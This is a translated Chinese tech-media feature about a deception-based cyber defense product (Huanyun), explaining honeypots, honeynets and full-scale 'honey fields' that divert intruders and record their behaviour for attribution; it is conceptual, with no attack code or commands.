The upper army attacks the plan, the second is to attack the diplomatic relations, the second is to attack the troops, and the lower is to attack the city. ——Sun Tzu's Art of War "Attack"
Introduction
Some professions are naturally respected because they are connected to a certain excellent characteristic of human beings. Dance reminds people of beautiful bodies; long-distance running reminds people of the qualities of perseverance. And hackers are reminiscent of superb technology.
Every individual and organization in the real world corresponds to a city of its own, big or small, in the map of the online world. And in the sinister Internet jungle, every city faces sudden arrows from the darkness at any time.
All people in the martial arts world have always differentiation between good and evil.
Evil hackers often lead bandits to enter the city to burn, kill, loot; while righteous hackers hold weapons in their hands and stand tall on the top of the city, shooting the invaders' throat with righteous bullets.
It is true that many people think of hackers and think of superb technology. However, when you truly understand the truth about the desperate battle in the Cyber World, you will understand that the highest praise for hackers is not the superb skills of siege cities, but the shining wisdom of defeating others without fighting.
Zhuge Liang did not spend a single soldier, but relied on a musical sound to repel Sima Yi's 100,000 troops and defended the world.
Eisenhower was able to make plans and let the German main force defeat Kalai, so that the day of glory for mankind can be achieved - Normandy landing;
The dream makers in " Inception " made the subconscious attack that Fisher, the heir of the energy giant, voluntarily dissolved the company.
"The Art of War" says that siege the city as the lower, and attacking the heart as the higher.
"spoofing system" of Chinese hackers
The reason why the world of hackers is attractive is precisely because all our fantasies in the real world are happening here. Invading a company and obtaining a large amount of confidential information can give opponents a fatal blow in the mall.
This is a true story. The board of directors of a well-known company just ended the meeting and the minutes of their meeting were set on the table of the competitors; the documents just written by the chairman were not available for his own company to print and publish them, and the opponent had already circulated them across the company. Before the latest mobile phone prototype designed by his company was produced, the opponent had already copied it based on the drawings and occupied the market.
The commercial competition we see is almost always behind the unspeakable bloody battles in the cyber world, and behind this bloody battle may determine a person's rise and fall, honor and disgrace in his life. For this goal, evil hackers can use the most vicious tricks to penetrate and invade.
However, the reason why this world does not make people desperate is precisely because justice hackers stepped forward and voluntarily build a powerful skynet to fight against evil. These hackers include the first-generation Chinese hackers CP and la0wang who have been stealthing for more than ten years and have used their own technology to profoundly change China's position in world politics, as well as the security giant Oscar who once took the lead in Tencent to resist the online black market and Jannock, the best man in dark clouds who can use a string of code to travel to all websites.
In 2014, these hackers who represent the strongest hacker firepower in China came together and formed a "gang" called "Jinxing Technology". The primary goal of this gang is to eliminate the dirty attacks and crazy information theft of hackers and mercenaries on the company.
And their unique weapon is the "cyberspace fraud system" - Huanyun.
From a philosophical point of view, all achievements in this world come from the determination of information. For example,
If you can see through the pawns your opponent will take next, then you will be sure to win;
If you can listen to the goddess’ thinking information, then your probability of success in confessing will increase;
If you are sure to know which stock will rise tomorrow, then you will definitely be able to double your value.
But what if you think it is certain information, it is actually fake? Let your opponent believe that he has your sure information, and this is exactly the illusion you create, which is already at an absolute advantage in defense.Simply put, Huanyun tried to create such a deception system, which made the invading hackers think that they had entered the company, but in fact he just entered a carefully constructed virtual world, a dream-inception space controlled by the Buddha of Tathagata, and a glass house where he exposed himself a little more every step he took.
Honeypot, Miwang and Michang
just talked about so many deception philosophy, how to implement it?
Leifeng NetZhaike Channel has the opportunity to talk to several big guys from Jinxing Technology. They proposed three interesting concepts: honeypot, honeynet and honeyfield.
honeypot
honeypot is a very vivid word: honey + jar, and the English word is also honey + pot.
honey represents the sweetness benefit, that is, the characteristics that the attacker may be interested in, while the can represents an environment through which the behavior of the intruder can be captured.
, figuratively, it's like , which grew in the Americas, . Use the sweet breath to attract flies to come and feed, but once the flies enter the trap, their fate will take a sharp turn.
Although the hackers who entered the honeypot would not be buried here, they left their own attack tools and attack traces. After studying the tools used by hackers, defenders can easily develop corresponding anti-defense tools, just like the human body, gaining immunity to new viruses. Hu Peng, product director of
Jinxing Technology, gave a simple popular science for Leifeng NetZhaike Channel.
honeypots are generally divided into low-interaction honeypots and high-interaction honeypots. Low-interaction honeypots are generally used to alarm or obtain some attack codes. High-interaction honeypots are used to deeply observe attackers' behavior and analyze them.
But overall, the problem with honeypot is that the environment is too single, the characteristics are obvious, and the attacker is easy to identify.
Imagine if all flies remember the shape of Venus Flytrap, I believe that Venus Flytrap will only catch various bricks and stones in the future.
Miwang
Simply put, Miwang is an organized honeypot, using various honeypots to build a deception network. For hackers, they cannot rely on vision in the cyberspace. They were like a thief sneaking into a dark villa, where all the furnishings needed to be touched by their hands, and then marked them themselves, drawing an internal map of their "imagined".
If the infiltrated hacker is an experienced habitual criminal who only touches a fake door and finds that there is nothing behind the door, then he can determine that this door is a honey pot.
However, if different honey pots are used to form honey nets, the thief will believe that there is a room behind the door, which is furnished with a wardrobe, sofa, desk, etc. During the thief process, the honeynet setter has more time to observe the visitor and wait for him to use more offensive tools to create a more comprehensive protective weapon.
However, as the metaphor just now, Miwang is just a virtual room assuming it is assumed to be in a real villa. Before the thief enters Miwang, he will inevitably pass through other real rooms. Since Miwang is set up in the real system of the enterprise, there is still a possibility of hacking for the enterprise.
So the honey field appeared.
honey field
The so-called honey field is to use honeypots and honeynets to fully simulate all the architectures of a company. It is equivalent to rebuilding a corporate villa and then putting a portal (redirector). Once a possible attack is detected, the hacker traffic will be directly transferred to the fake villa (honey field).
As long as the hacker enters the honey field, everything he wants can be "find". The core business data he wants is placed on the desk, the financial statements he wants are in the safe, and the organizational personnel structure diagram he wants is on the bookshelf.
All of this is an illusion based on the real situation of the company. Of course, all the data is fake. How similar is this fake "honey field" and the real environment of the enterprise?
Chief Security Officer of Jinxing Technology la0wang (Wang Junqing) told Leifeng NetZhaike Channel:
A honey field does not actually have to be 100% similar to the real network architecture of the enterprise, but should be 100% the same as the enterprise network architecture imagined by hackers.Because the hacker has never seen the real network of the company, he will only compare the situation he touches with his imagination. The closer he gets to the imagination, the less they suspect that they have invaded the fake system.
[Logical structure of honeypot, honeynet, honey field]
"Inception" within honey field: Fantasy cloud
Since ancient times, people can understand the concept of honey field. However, a very important step for a good "deception system" is exactly the first step: introducing hackers into this "Inception space".
Since the internal network of the enterprise needs to operate normally, it is necessary to provide services to good people with permissions, and lead bad people to another "deception system" in time and space - Huanyun.
So an important ability that an enterprise intranet needs to master is to distinguish good people from bad people.
In this regard, these big hackers have designed a sophisticated verification system.
Since we have done security tests for nearly twenty years, we often try to break through the system's defense without the opponent's grassroots employees at all. Therefore, our understanding of the attacker is very profound. We can clearly tell which behaviors are normal and which behaviors are only done by intruders.
These characteristics are not obvious actions, but may be a very small port search action, or an unusual query method, just like an old detective who can lock in a thief with a small action.
la0wang said so.
is also back to the metaphor of thieves and villas. After the thief enters the villa, he will touch several identical doors. As a thief, he couldn't tell which door has valuable information behind it, so his approach must be to try to pry several doors first. One of the doors was pried open without much effort, and the thief would definitely choose to enter this room first to take a look.
Yes, this best pry-open door is exactly the entrance to the honey field.
Once he is directed to the honey field, the thief's world will be stolen and replaced. Even if he quickly exits the house, everything outside has been quietly replaced with the honey field.
I don’t need all real door locks to be very strong, I just need all real door locks to be stronger than this door lock leading to the Illusion Cloud, that’s enough.
said Lao Wang.
This false door is called in professional terms: trapping nodes. In fact, trapping nodes can be deployed in many parts of the network environment, such as office network, DMZ area (isolation area), core data area, etc. As long as an intruder hits any node, it will be instantly directed to "Inception" and will never be able to return.
[Attack Stream Redirection Schematic]
Our goal is to angrily criticize the hacker
Since you are here, don't leave.
This must be what the deception system wants to say to intruders.
Because it provides a realistic environment, hackers will not only not doubt the environment they are in, but will instead be complacent about their technology. And at this time, it is a good opportunity to monitor hackers.
[Screenshot of the Fantasy Cloud System]
Let’s take a photo: Hacker panoramic video
Hacker proudly shuttles through the Fantasy Cloud, and the system will record network data, host data, and various types of behavioral data during the attack.
These data are so detailed that it is outrageous. Hu Peng introduced: The ratio of data we collect is 1:50. What is this ratio? For example, when we capture an attacker's attack command, we will obtain relevant information from nearly 50 projects at the same time, including the auxiliary information, related information, environmental information, etc. We will save all data related to this command.
Why do this? Because the attack process is very valuable, especially the entire process of intranet penetration, if we do not save so much data, the subsequent analysis may be affected. If we save enough data, it will lay a good data foundation for subsequent analysis. So, we decided to save enough detailed attack data.
Of course, all the process of collecting information must be completely silent. Because once an attacker discovers a flaw, he is likely to leave immediately, or choose to do many behaviors that confuse the opponent.
la0wang said:
We use very hidden traceless monitoring technology, just like a house with vibration sensing sensors underground. The hacker cannot see anything in the room, but his every move will be recorded through vibration waves. Attackers can be happy to attack in our environment, and we can be happy to collect attacker behavior data. Why not do it?
Let’s take a look at the photos: judge the attack intention through the "context"
has a rich and detailed data foundation, and you can start behavioral analysis. One of the interesting techniques for designing this is the attacker's "context".
A brief example:
This is a screenshot of a conversation on WeChat. From the conversation, you can see that the person on the right wants to borrow 5,000 yuan from Brother Quan on the left. So is that true? Let’s look at the second picture:
After looking at the second picture, we realized that Brother Quan on the left owed others money and refused to pay it back, and he didn’t keep his word and denied it deliberately. In fact, this story of not paying back the money is still very long and exciting. Due to the limited space, I only cut off one of the paragraphs. What should I use this example to illustrate?
If we are not in a continuous and complete contextual environment, then the results of our analysis of the data are likely to be wrong results.
Therefore, a complete attack context includes: behavior context, attack time, business scenario, target object and other context factors related to attack.
Hu Peng gave us a few simple examples:
Business scenario: Our deception environment is composed of different business scenarios, such as office area, DMZ area, core data area, etc. Then the same actions in different scenarios will have different meanings, and our analysis is carried out in specific business scenarios.
Important links: During the attack process, the attacker will have different action characteristics in different links, such as detection when entering the intranet, infiltration after detection, acquisition of data after success, and clearing traces when leaving, etc. These are all important links in the attack process. Analysis of important links can allow us to organize an orderly process from the complex data, and the results of the entire analysis will be clearer.
Key path: Attacks will form a certain attack path during the attack process, that is, how the attacker achieves the target step by step, what key positions are passed through, such as how the attacker chooses different attack paths, such as how to enter the core data area from the office area, the attacker needs to first find the machine of the operation and maintenance personnel or administrator to enter, then the operation and maintenance personnel or administrator is the key point in the attack path. Through the analysis of the critical path, the attacker's offensive ideas and attack skills can be seen.
Habit features: attackers will inevitably present personal habit characteristics when attacking, such as the input instructions. Some attackers will get used to checking whether other users are online after entering, some attackers will get used to checking the process regularly, and some are used to flipping files as soon as they enter. Starting from these features, we can analyze the attacker's habit characteristics and use them to portray the attacker's image.
Let’s find the protagonist: Hacker traceability
With the above actions, the defender will get valuable information, which is:
The attacker’s source: Where did he launch the attack?
The attacker's idea: what kind of path did he choose to get the information he wants step by step.
The identity of the attacker: what tools he used and what attack characteristics he had.
Evidence of the attacker: evidence of all his attacks.
With this information, in principle, the identity and background of the intruder can be locked. From this moment on, the victory or defeat of the Cyber World battle has been decided.What remains is the punishment of law and justice on the body of hackers in the real world.
summary·Interview notes
The Internet world is a replica of the real world. Almost everyone admits this sad conclusion: wherever there are people, there are conspiracies and frame-ups.
Unfortunately, the online world is more vast and complex than the real world. The light of justice cannot shine on all the creases in this space. More often, this is like a dark forest, and we need to arm ourselves with weapons to fight the bullets that invade from the darkness.
The so-called "Big Way is simple". Even though cyberspace is imported to China, "deception and defense" is rooted in China's philosophy of war. At this point, the attempts of China's justice hackers are worthy of admiration.
The best weapon to deal with violence is not violence, but deception.
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-